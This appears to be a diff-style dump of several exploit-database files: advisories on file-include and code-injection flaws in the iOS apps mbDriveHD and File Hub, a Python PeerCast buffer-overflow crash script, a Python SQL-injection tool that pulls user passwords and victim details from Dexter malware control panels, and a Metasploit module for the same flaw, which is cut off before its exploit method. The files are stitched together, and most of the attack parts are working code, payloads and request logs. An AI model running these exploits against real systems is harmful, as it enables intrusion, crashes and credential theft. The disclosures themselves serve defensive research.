( Copy of the Homepage: https://itunes.apple.com/de/app/mbdrivehd-free/id399732602 - Free Edition )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official mbDriveHD v1.0.7 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
mbpowertools
Product: mbDriveHD - iOS Mobile Web Application 1.0.7
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the web-application/device.
The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are
able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file index section after the POST method request. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Directory Listing
1.2
A local command/path injection web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application.
The remote vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile application.
The vulnerability is located in the in the `device name` value of the `index and sub category listing` module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
with a cvss (common vulnerability scoring system) count of 6.0(+)|(-)6.1.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index File Directory Listing - [Header]
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: Upload > [filename]
<p><a href="..">..</a><br>
<table width="750"><tbody>
<tr>
<td width="500"><a href="><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">><><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">.jpg</a></td>
<td align="right" width="140" > 23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:49:43 +0000</td>
</tr><tr>
<td width="500" ><a href="><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg</a></td>
<td align="right" width="140" > 23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:32:23 +0000</td>
</tr></tbody></table>
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file:<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
</body></html></iframe></a></td></tr></tbody></table></p>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1228] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.109:8080/]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------27573282698270
Content-Disposition: form-data; name="file"; filename="<%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg"
Content-Type: image/jpeg
1.2
The local command inject web vulnerability can be exploited by remote attackers with physical device access and without
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the mobile web application and start it
2. Open your device settings info menu and change the `device name` to your own command/path string combined with script code
3. Save the device name and open the software
4. Activate the wifi interface port 8080
PoC: Device Name - Command Inject Vulnerability
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Files from bkm337?</title><style>html {background-color:#eeeeee} body
{ background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x;
margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head>
<body><h1>Files from bkm337?[LOCAL COMMAND INJECT VIA DEVICE NAME VALUE!]</h1><bq>The following files are hosted live
from the iPad's Docs folder.</bq><p><a href="..">..</a><br><table width="750"><tbody><tr>
<td width="500"><a href="37.jpg">37.jpg</a></td>
<td align="right" width="140">23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:32:23 +0000</td>
</tr></tbody></table>
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file:<input name="file" id="file" type="file"></label><label>
<input name="button" id="button" value="Submit" type="submit"></label></form></body></html>
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure parse of the filename value in the vulnerable upload POST method request.
Ensure also the output name and data information context is secure encoded to prevent persistent injects or command executions.
1.2
The local command inject web vulnerability can be patched by a secure encode of the vulnerable device name value in the header location of the web-interface.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
the security risk of the local command inject web vulnerability is estimated as medium(+)|(-)high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

323
platforms/hardware/webapps/31693.txt Executable file
View file

@ -0,0 +1,323 @@
Document Title:
===============
File Hub v1.9.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1195
Release Date:
=============
2014-02-15
Vulnerability Laboratory ID (VL-ID):
====================================
1195
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
File Hub is a powerful and intuitive file manager for iOS. Read, Play, View many file formats, easily transfer files
between computer or cloud services and manage files via browser on computer. Voice recorder, text file editor and more.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/file-hub-usb+wifi+bluetooth+cloud/id520299954 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical web vulnerabilities in the official File Hub v1.9.1 iOS application.
Vulnerability Disclosure Timeline:
==================================
2014-02-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: File Hub - Mobile Web Application 1.9.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A critical remote code execution web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application.
The web vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service.
The vulnerability is located in the `folder rename via edit` and `new folder` function of the file hub wifi application interface. Remote attackers
are able to inject own system specific codes as folder/path name to compromise the application. The code execution occurs after the inject via POST
method in the main index and the sub category folder. In the sub category folder the code executes in the header location of the application context.
In the main index the code execution occurs in the index file dir & item list. The security risk of the remote code execution vulnerability in the
new folder function is estimated as critical with a cvss (common vulnerability scoring system) count of 9.3(+)|(-)9.4.
Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password.
Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] New Folder (Add)
Vulnerable Parameter(s):
[+] folder name
Affected Module(s):
[+] Index File Dir Item List - Path Dir Location on Top
[+] Sub Category - Header Location to Path
1.2
A local file include web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the web-application or mobile device.
The web vulnerability is located in the `file name` value of the `Files to Upload` module POST method request. Remote attackers are
able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file to path section after the refresh of the file upload.
The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring
system) count of 7.3(+)|(-)7.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Files to Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Item List
[+] Sub Category File Dir Item List
[+] Index File or Item Edit
[+] Index File or Item Remove/Delete
Proof of Concept (PoC):
=======================
1.1
The remote code execution web vulnerability can be exploited by remote attackers without user interaction and privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC:
<table class="jtable"><thead><tr><th style="width: 1%;" class="jtable-command-column-header jtable-column-header-selecting">
<div class="jtable-column-header-container"><input type="checkbox"></div></th><th style="width: 12.1164%;" class="jtable-column-header">
<div class="jtable-column-header-container"><span class="jtable-column-header-text"></span><div class="jtable-column-resize-handler"></div></div></th>
<th style="width: 48.5344%;" class="jtable-column-header"><div class="jtable-column-header-container">
<span class="jtable-column-header-text">File Name</span><div class="jtable-column-resize-handler"></div></div></th>
<th style="width: 12.1164%;" class="jtable-column-header"><div class="jtable-column-header-container"><span class="jtable-column-header-text">File Size</span>
<div class="jtable-column-resize-handler"></div></div></th><th style="width: 19.4138%;" class="jtable-column-header"><div class="jtable-column-header-container">
<span class="jtable-column-header-text">Last modified</span><div class="jtable-column-resize-handler"></div></div></th><th style="width: 4.81902%;"
class="jtable-column-header"><div class="jtable-column-header-container"><span class="jtable-column-header-text"></span></div></th><th style="width: 1%;"
class="jtable-command-column-header"></th><th style="width: 1%;" class="jtable-command-column-header"></th></tr></thead><tbody><tr data-record-key="/BKM-Filter-Bypass-0ne"
class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png" height="32px"
width="32px"></td><td><a style="cursor: pointer;" href="http://localhost:8080/">BKM-Filter-Bypass-0ne</a></td><td>N/A</td><td>11.02.14 20:01</td><td></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete"><span>Delete</span></button></td></tr>
<tr data-record-key="/test23" class="jtable-data-row"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png"
height="32px" width="32px"></td><td><a style="cursor: pointer;" href="http://localhost:8080/">test23</a></td><td>N/A</td><td>11.02.14 20:01</td><td></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete"><span>Delete</span></button></td></tr>
<tr data-record-key="/test337+">[REMOTE CODE EXECUTION VULNERABILITY!]>" class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column">
<input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png" height="32px" width="32px"></td>
<td><a style="cursor: pointer;" href="http://localhost:8080/">test337 "><[REMOTE CODE EXECUTION VULNERABILITY!]"></a></iframe></a></td><td>N/A</td>
<td>11.02.14 20:01</td><td></td><td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file">
<span>Rename file</span></button></td><td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete">
<span>Delete</span></button></td></tr></tbody></table>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/rename.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Gr??e des Inhalts[171] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Content-Length[61]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
FileId[%2Ftest337[REMOTE CODE EXECUTION VALUE!]]
Name[localhost]
Response Header:
Accept-Ranges[bytes]
Content-Length[171]
Date[Tue, 11 Feb 2014 19:02:54 GMT]
Status: 200[OK]
GET http://localhost:8080/[REMOTE CODE EXECUTION VALUE!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[337]
Date[Tue, 11 Feb 2014 19:02:54 GMT]
1.2
The local file include web vulnerability can be exploited by remote attackers without privileged web application user account and also
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC:
<th style="width: 1%;" class="jtable-command-column-header"></th><th style="width: 1%;"
class="jtable-command-column-header"></th></tr></thead><tbody><tr data-record-key="/asdads/8f11a581d505d476cebd607056e4c167621c2e61.jpg"
class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column"><input type="checkbox"></td><td>
<img src="File%20Hub_3-Dateien/jpg.png" height="32px" width="32px"></td><td><a style="cursor: pointer;"
href="http://localhost:8080/">%20>"\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg</a></td><td>24 Kb</td><td>11.02.14 20:30</td><td>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/upload.php Load Flags[LOAD_BYPASS_CACHE ]
Gr??e des Inhalts[16]
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Cache-Control[no-cache]
Referer[http://192.168.2.109:8080/]
Content-Length[25068]
Content-Type[multipart/form-data; boundary=---------------------------13158193021484]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
Pragma[no-cache]
POST-Daten:
POST_DATA[-----------------------------13158193021484
Content-Disposition: form-data; name="uploader"
fineuploader
-----------------------------13158193021484
Content-Disposition: form-data; name="dirpath"
/test23
-----------------------------13158193021484
Content-Disposition: form-data; name="qquuid"
ed6448c1-abb5-4df8-9216-2adb17900f55
-----------------------------13158193021484
Content-Disposition: form-data; name="qqtotalfilesize"
24386
-----------------------------13158193021484
Content-Disposition: form-data; name="qqfile"; filename="\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg"
Content-Type: image/jpeg
????
PoC: Button Error in Menu - qqfile > filename (Edit & Delete)
<button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete">
<span>Delete</span></button></td></tr><tr data-record-key="/test337 "><\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg"
class="jtable-data-row jtable-row-selected"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="/webroot/images/fileicons/folder.png"
height="32px" width="32px"></td><td><a style="cursor: pointer;" href=".">test337 "><\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg">
</a></a></td>
Solution - Fix & Patch:
=======================
1.1
The remote code execution vulnerability can be patched by a secure restriction and parse of the vulnerable rename and folder name values.
1.2
The local file include web vulnerability can be patched by a secure parse and encode of file names. Ensure also that the values in the index and
sub category item list are prepared with a secure validation to prevent file include or arbitrary file upload attacks.
Security Risk:
==============
1.1
The security risk of the remote code execution web vulnerability is estimated as critical.
1.2
The security risk of the local file include web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

29
platforms/linux/dos/31713.py Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/28986/info
PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect PeerCast 0.1218; other versions may also be affected.
#!/usr/bin/env python
import sys, socket
port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'
if(len(sys.argv) < 2):
print "ERR: please specify a hostname"
sys.exit(-1)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], port))
s.send(buff);
except:
print "ERR: socket()"
sys.exit(-1)

193
platforms/multiple/webapps/31686.py Executable file
View file

@ -0,0 +1,193 @@
# Exploit Title: Dexter (CasinoLoader) Panel SQLi
# Date: Feb, 13, 2014
# Exploit Author: Brian Wallace (@botnet_hunter)
# Version: CasinoLoader
# Tested on: Windows 7, Ubuntu, Debian
import pycurl
import urllib
import cStringIO
import base64
import argparse
import sys
import string
import pygeoip
version = "0.1-http_bots-PoC"
def PrintHelp():
global version
print "usage: dexter.PoC.py [-h] [action] [gateway url]"
print ""
print "Dexter CasinoLoader BAMF PoC v" + version
print "Exploiting CasinoLoader panels for information"
print "By Brian Wallace (@botnet_hunter)"
print ""
print "arguments:"
print " action Actions to be taken against the botnet (default: dump)"
print " dump - Print configuration information obtained from source file"
print " drop - Execute a command to make the bot scripts exit"
print " source Path to non-obfuscated source code for the target bot (default: stdin)"
print ""
print("GPS:")
print(" -m MaxMind Location Location of Maxmind database files (default .)")
print ""
print " -h, --help Print this message"
print ""
class DexterPanel:
def __init__(self, gateway_url):
self.gateway_url = gateway_url
@staticmethod
def _get_field(gateway, table, column, row):
buf = cStringIO.StringIO()
c = pycurl.Curl()
c.setopt(c.URL, gateway)
page = "' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + str(row) + " -- --"
params = urllib.urlencode({'val': 'AA==', 'page': base64.b64encode(page)})
c.setopt(c.POSTFIELDS, params)
c.setopt(c.HEADERFUNCTION, buf.write)
c.perform()
val = buf.getvalue()
cookie = None
for line in val.split('\n'):
line = line.strip()
if line.count('Set-Cookie:') > 0 and line.count("response") > 0:
cookie = line
cookie = cookie[cookie.find('=') + 1:]
cookie = urllib.unquote(cookie)
cookie = base64.b64decode(cookie)
cookie = cookie[1:]
cookie = cookie[:-2]
break
buf.close()
return cookie
def get_all_user_details(self):
count = 0
users = []
while True:
user = self._get_field(self.gateway_url, 'users', 'name', count)
if user is None or user == "":
break
password = self._get_field(self.gateway_url, 'users', 'password', count)
count += 1
users.append({'user': user, 'password': password})
return users
def get_all_bot_details(self):
count = 0
bots = []
while True:
user = self._get_field(self.gateway_url, 'bots', 'RemoteIP', count)
if user is None or user == "":
break
count += 1
bots.append({'RemoteIP': user,
'UID': self._get_field(self.gateway_url, 'bots', 'UID', count),
'Version': self._get_field(self.gateway_url, 'bots', 'Version', count),
'Username': self._get_field(self.gateway_url, 'bots', 'Username', count),
'Computername': self._get_field(self.gateway_url, 'bots', 'Computername', count),
'UserAgent': self._get_field(self.gateway_url, 'bots', 'UserAgent', count),
'OS': self._get_field(self.gateway_url, 'bots', 'OS', count),
'Architecture': self._get_field(self.gateway_url, 'bots', 'Architecture', count),
'Idle Time': self._get_field(self.gateway_url, 'bots', 'Idle Time', count),
'Process List': self._get_field(self.gateway_url, 'bots', 'Process List', count),
'LastVisit': self._get_field(self.gateway_url, 'bots', 'LastVisit', count),
'LastCommand': self._get_field(self.gateway_url, 'bots', 'LastCommand', count)})
return bots
if __name__ == "__main__":
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('action', nargs='?', type=str, default="dump", help="Actions to be taken against pBots (default: dump)", choices=["dump", "graph"])
parser.add_argument('gateway', nargs='?', type=str, default=None, help="URL to Dexter bot gateway")
parser.add_argument('-m', metavar='maxmind', type=str, nargs='?', default='./GeoLiteCity.dat')
parser.add_argument('-h', '--help', default=False, required=False, action='store_true')
args = parser.parse_args()
if args.help or args.gateway is None:
PrintHelp()
sys.exit()
if args.action == "dump":
url = args.gateway
dex = DexterPanel(url)
print "User details: %s" % dex.get_all_user_details()
print "Bot details: %s" % dex.get_all_bot_details()
elif args.action == "graph":
url = args.gateway
dex = DexterPanel(url)
bots = dex.get_all_bot_details()
#load Maxmind
sys.stderr.write('Loading MaxMind Database\n')
gi = pygeoip.GeoIP(args.m)
nodes = {}
connections = []
nodes["C2"] = {"id": 0, "label": "C2", "mod": 0}
highestnode = 1
#loop through all bots
for bot in bots:
ip = bot["RemoteIP"]
geoip = gi.record_by_addr(ip)
node = {"id": highestnode, "label": ip, "host": ip, "mod": 1}
highestnode += 1
if geoip is not None:
node['lat'] = geoip["latitude"]
node['lng'] = geoip["longitude"]
nodes[ip] = node
connections.append([node['id'], 0])
print('<?xml version="1.0" encoding="UTF-8"?>')
print('<gexf xmlns="http://www.gexf.net/1.2draft" version="1.2">')
print(' <meta lastmodifieddate="2009-03-20">')
print((' <creator>' + "bwall" + '</creator>'))
print(' <description></description>')
print(' </meta>')
print(' <graph mode="static" defaultedgetype="directed">')
print(' <attributes class="node" mode="static">')
print(' <attribute id="modularity_class" title="Modularity Class" type="integer"></attribute>')
print(' <attribute id="lat" title="lat" type="double"></attribute>')
print(' <attribute id="lng" title="lng" type="double"></attribute>')
print(' </attributes>')
print(' <nodes>')
for name, node in list(nodes.items()):
if 'lat' in node:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="' + str(node['lat']) + '"></attvalue>')
print(' <attvalue for="lng" value="' + str(node['lng']) + '"></attvalue>')
print(' </attvalues>')
print(' </node>')
else:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="0"></attvalue>')
print(' <attvalue for="lng" value="0"></attvalue>')
print(' </attvalues>')
print(' </node>')
print(' </nodes>')
print(' <edges>')
count = 0
for node in connections:
print((' <edge id="' + str(count) + '" source="' + str(node[0]) +
'" target="' + str(node[1]) + '" />'))
count += 1
print(' </edges>')
print(' </graph>')
print('</gexf>')

172
platforms/php/remote/31695.rb Executable file
View file

@ -0,0 +1,172 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Dexter (CasinoLoader) SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in the command and control panel
used to control Dexter (Point of Sale malware). This is done by accessing the
PHP page used by bots to report in (gateway.php) which does not sanitize input.
Input is encrypted and encoded, but the key is supplied by the bot connecting.
The 'page' parameter is used in this case. The command and control panel designates
a location to upload files, and can be used as a reliable location to write a
PHP shell. Authentication is not needed to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bwall (Brian Wallace) <bwallace[at]cylance.com>'
],
'References' =>
[
[
"URL", "http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['CasinoLoader gateway.php on Windows', {}],
['CasinoLoader gateway.php on Linux', {}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 08 2014"
))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the CasinoLoader root folder', '/']),
OptString.new('TARGETGATEWAY', [true, 'Name of bot gateway page', 'gateway.php']),
OptString.new('TARGETLOGIN', [true, 'Name of panel login page', 'index.php']),
OptString.new('TARGETUPLOAD', [true, 'Name of panel upload page', 'upload.php']),
OptString.new('TARGETDATABASEUSERTABLE', [true, 'Table in database that holds admin data', 'users'])
], self.class)
end
def gateway
return normalize_uri(target_uri.path, datastore['TARGETGATEWAY'])
end
def login
return normalize_uri(target_uri.path, datastore['TARGETLOGIN'])
end
def upload
return normalize_uri(target_uri.path, datastore['TARGETUPLOAD'])
end
def database_get_field(table, column, row)
res = send_request_cgi({
'method' => 'POST',
'uri'=>gateway,
'vars_post' => {
'val' => 'AA==',
'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
}
})
if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=')
return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
end
return false
end
def check
testvalue = rand_text_alpha(9)
res = send_request_cgi({
'method' => 'POST',
'uri'=>gateway,
'vars_post' => {
'val' => 'AA==',
'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1,'" + testvalue + "',3 -- --")
}
})
if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and
Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
